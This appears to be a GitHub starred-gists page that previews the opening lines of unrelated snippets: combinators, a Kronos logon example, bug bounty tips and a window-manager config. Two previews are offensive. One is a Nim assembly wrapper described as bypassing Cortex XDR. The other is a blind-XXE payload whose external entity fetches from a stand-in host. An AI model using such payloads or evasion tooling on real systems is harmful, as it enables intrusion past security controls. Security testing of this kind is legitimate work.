Skip to content

Instantly share code, notes, and snippets.

View xee5ch's full-sized avatar

Al xee5ch

View GitHub Profile
@beltiras
beltiras / cto.py
Last active August 27, 2023 02:45
import time
import datetime
def timing_protect(constant_time):
"""
The jitter will depend not on runtime but activity on the system writ large
@zimnyaa
zimnyaa / nim-assembly-wrapper.py
Created January 31, 2022 13:44
Used in an engagement to bypass Cortex XDR (use NO to break argument signatures). Was about to add unhooking/AMSI+ETW patches, but Nimpackt came out a day after, and you can just use that instead.
import sys, os
nim_template = """import winim/clr
import os
import strutils
proc execute(assembly_bytes: openarray[byte], args: openarray[string]) =
@Stevoisiak
Stevoisiak / kronos-wfc-logon.py
Last active November 22, 2021 21:28
Python script to log on to Kronos WFC using the XML API
# Logs on to Kronos WFC using an XML request
# Written as an example for https://stackoverflow.com/a/46776518/3357935
import requests
url = "http://localhost/wfc/XmlService"
headers = {'Content-Type': 'text/xml'}
data = """<Kronos_WFC version = "1.0">
<Request Object="System" Action="Logon" Username="SomeUsername" Password="SomePassword" />
</Kronos_WFC>"""
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active November 8, 2024 20:13
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@simonw
simonw / recover_source_code.md
Last active September 28, 2024 08:10
How to recover lost Python source code if it's still resident in-memory

How to recover lost Python source code if it's still resident in-memory

I screwed up using git ("git checkout --" on the wrong file) and managed to delete the code I had just written... but it was still running in a process in a docker container. Here's how I got it back, using https://pypi.python.org/pypi/pyrasite/ and https://pypi.python.org/pypi/uncompyle6

Attach a shell to the docker container

Install GDB (needed by pyrasite)

apt-get update && apt-get install gdb
@Avaq
Avaq / combinators.js
Last active September 26, 2024 18:53
Common combinators in JavaScript
const I = x => x
const K = x => y => x
const A = f => x => f (x)
const T = x => f => f (x)
const W = f => x => f (x) (x)
const C = f => y => x => f (x) (y)
const B = f => g => x => f (g (x))
const S = f => g => x => f (x) (g (x))
const S_ = f => g => x => f (g (x)) (x)
const S2 = f => g => h => x => f (g (x)) (h (x))

What is the difference between Cerebral and Redux?

Cerebral and Redux were built to solve different problems

Redux was developed to achieve hot reloading global state and state changing logic. To achieve that it was necessary for state changes to be run with pure functions and the state has to be immutable. Now you can change the logic inside your reducer and when the application reloads Redux will put it in its initial state and rerun all the actions again, now running with the new state changing logic.

Cerebral had no intention of achieving hot reloading. Cerebral was initially developed to give you insight into how your application changes its state, using a debugger. In the Redux debugger you see what actions are triggered and how your state looks after the action was handled. In Cerebral you see all actions fired as part of a signal. You see asynchronous behaviour, paths taken based on decisions made in your state changing flow. You see all inputs and outputs produced during the flow and you even

@ryancdotorg
ryancdotorg / frag32.py
Created August 20, 2015 16:27
A FAT32 fragmenter, because I am a horrible person.
#!/usr/bin/env python
import random
import struct
import sys
# Most of the Fat32 class was cribbed from https://gist.github.com/jonte/4577833
def ppNum(num):
return "%s (%s)" % (hex(num), num)
@staaldraad
staaldraad / XXE_payloads
Last active October 8, 2024 15:20
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@dmb2
dmb2 / .stumpwmrc
Created February 2, 2014 22:49
Bill Zimmerly's stumpwmrc
;;;; -*- Mode: Lisp -*-
;; 20130620 (WBZ) This version of my .stumpwmrc is the culmination
;; of several days of study, experimentation, and asking of help
;; from others. (Beginning on 20130609.)
;;
;; This file is called "~/bin/stump/my.stumpwmrc" and is symbolically
;; linked as follows:
;;
;; $ cd; ln -s ~/bin/stump/my.stumpwmrc .stumpwmrc